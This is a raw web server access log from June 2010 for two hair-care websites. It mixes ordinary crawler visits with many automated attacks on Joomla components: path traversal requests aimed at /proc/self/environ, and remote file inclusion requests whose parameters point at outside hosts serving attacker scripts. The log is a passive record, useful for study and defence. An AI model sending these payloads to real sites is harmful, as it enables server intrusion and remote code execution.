208.115.111.245 - - [07/Jun/2010:19:06:04 -0700] "GET /logs/ HTTP/1.1" 200 5800 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:06:07 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:06:11 -0700] "GET /tmp/?N=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:06:15 -0700] "GET /?N=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:06:19 -0700] "GET /tmp/?N=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
118.129.166.213 - - [07/Jun/2010:19:07:18 -0700] "GET /logs/access_100222.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:07:18 -0700] "GET /logs/access_100222.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:07:19 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:07:19 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:07:19 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:07:19 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
222.236.47.182 - - [07/Jun/2010:19:08:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dishop.co.kr//upload/movie/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [07/Jun/2010:19:08:41 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dishop.co.kr//upload/movie/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [07/Jun/2010:19:08:42 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dishop.co.kr//upload/movie/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.213 - - [07/Jun/2010:19:14:56 -0700] "GET /logs/access_100201.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:15:02 -0700] "GET /logs/access_100201.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:19:17:36 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:23:10 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:23:11 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:23:11 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:24:32 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:19:24:32 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:29:40 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [07/Jun/2010:19:29:40 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [07/Jun/2010:19:29:40 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [07/Jun/2010:19:29:42 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [07/Jun/2010:19:29:47 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [07/Jun/2010:19:29:51 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [07/Jun/2010:19:29:51 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:29:51 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:29:51 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:29:54 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:29:54 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:29:54 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.108.172.26 - - [07/Jun/2010:19:31:17 -0700] "GET /logs/access_100503.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:19:31:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7592 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:19:53:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18936 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.236.47.182 - - [07/Jun/2010:20:00:53 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controler=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
222.236.47.182 - - [07/Jun/2010:20:00:54 -0700] "GET /index.php?option=com_extcalendar&controler=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
222.236.47.182 - - [07/Jun/2010:20:00:55 -0700] "GET /logs//index.php?option=com_extcalendar&controler=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:20:03:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:20:13:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15304 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
91.212.226.240 - - [07/Jun/2010:20:16:22 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.212.226.240 - - [07/Jun/2010:20:16:23 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:20:24 -0700] "GET /logs/access.log/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:20:24 -0700] "GET /index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:20:25 -0700] "GET /logs/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:20:25 -0700] "GET /logs/access_100503.log/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:21:08 -0700] "GET /logs/access.log/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:21:08 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:21:08 -0700] "GET /logs/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:21:09 -0700] "GET /logs/access_100503.log/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:21:28 -0700] "GET /logs/access.log/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:21:28 -0700] "GET /index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:21:29 -0700] "GET /logs/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:21:48 -0700] "GET /index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:21:53 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:22:22 -0700] "GET /logs/access.log/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:22:22 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:22:22 -0700] "GET /logs/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:23:21 -0700] "GET /logs/access.log/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:23:21 -0700] "GET /index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:23:21 -0700] "GET /logs/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:23:23 -0700] "GET /logs/access_100503.log/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:24:22 -0700] "GET /logs/access.log/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:24:22 -0700] "GET /index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:24:22 -0700] "GET /logs/index.php?basedir=http://www.glam20.com/wallpaper/t/test/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:24:23 -0700] "GET /logs/access.log/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:24:24 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:24:24 -0700] "GET /logs/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:24:24 -0700] "GET /logs/access_100503.log/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:25:13 -0700] "GET /logs/access.log/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:25:13 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:25:13 -0700] "GET /logs/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
91.212.226.240 - - [07/Jun/2010:20:27:24 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "freehairsecrets.com"
91.212.226.240 - - [07/Jun/2010:20:27:24 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "freehairsecrets.com"
204.236.254.130 - - [07/Jun/2010:20:28:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
204.236.254.130 - - [07/Jun/2010:20:28:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2070 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:20:35:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14541 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
84.38.67.248 - - [07/Jun/2010:20:41:50 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [07/Jun/2010:20:43:43 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
91.212.226.210 - - [07/Jun/2010:20:48:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
91.212.226.210 - - [07/Jun/2010:20:48:29 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:53:02 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:53:02 -0700] "GET /logs/scripts.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:53:02 -0700] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "growlonghairfast.com"
74.125.75.19 - - [07/Jun/2010:20:53:24 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
72.35.80.52 - - [07/Jun/2010:20:54:31 -0700] "GET /logs/access_100308.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:54:31 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:54:31 -0700] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:54:36 -0700] "GET /logs/scripts.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:56:37 -0700] "GET /logs/access_100308.log%20%20/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:56:37 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:56:37 -0700] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "growlonghairfast.com"
72.35.80.52 - - [07/Jun/2010:20:56:43 -0700] "GET /logs/scripts.log%20%20/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.printnet.co.kr/bbs/data/country/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [07/Jun/2010:20:58:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "freehairsecrets.com"
91.212.226.210 - - [07/Jun/2010:20:58:19 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "freehairsecrets.com"
208.115.111.248 - - [07/Jun/2010:21:00:00 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 553567 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:21:00:02 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:21:00:04 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:21:00:06 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:21:00:11 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 2162688 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
